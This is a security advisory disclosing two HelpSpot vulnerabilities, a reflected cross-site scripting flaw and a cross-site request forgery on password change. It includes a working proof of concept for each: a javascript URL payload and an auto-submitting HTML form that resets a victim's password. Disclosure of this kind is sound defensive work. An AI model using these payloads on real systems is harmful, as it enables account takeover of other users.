Our 90 day responsible disclosure period has passed as of today (February 6th, 2018) so we are ready to release the public disclosures for bugs CVE-2017-16755/CVE-2017-16756.

CVE-2017-16755
Class: Cross-Site Scripting (Reflected)
Vendor: Userscape
Product: HelpSpot <= 4.7.1
Remote: Yes
Credit: Ruby Nealon, Olivier Beg

Exploit Info:
A reflected cross-site scripting vulnerability exists in the "return" parameter of the "index.php?pg=moderated" endpoint on HelpSpot installations below version 4.7.2, that executes when the return link is clicked.

Proof of Concept: 
Access the following path on a vulnerable endpoint: /index.php?pg=moderated&return=javascript:alert`1`

Solution:
The vulnerability is patched in HelpSpot versions 4.7.2 and above.

CVE-2017-16756
Class: Cross-Site Request Forgery
Vendor: Userscape
Product: HelpSpot <= 4.7.1
Remote: Yes
Credit: Ruby Nealon, Olivier Beg

Exploit Info:
A cross-site request forgery vulnerability exists on POST requests to the "index.php?pg=password.change" endpoint on HelpSpot installations below version 4.7.2. This allows an attacker to change the password of another users HelpSpot account.

Proof of Concept: 
The following HTML proof of concept demonstrates this attack by changing the users password to "CVE201716755POC":

<form action="https://VULNERABLE/index.php?pg=password.change" method="post" id="HelpspotPoC">
<input id="password" type="hidden" name="password" value="CVE201716755POC">
</form>
<script>
window.onload = function(){
document.forms['HelpspotPoC'].submit();
}
</script>

Solution:
The vulnerability is patched in HelpSpot versions 4.7.2 and above.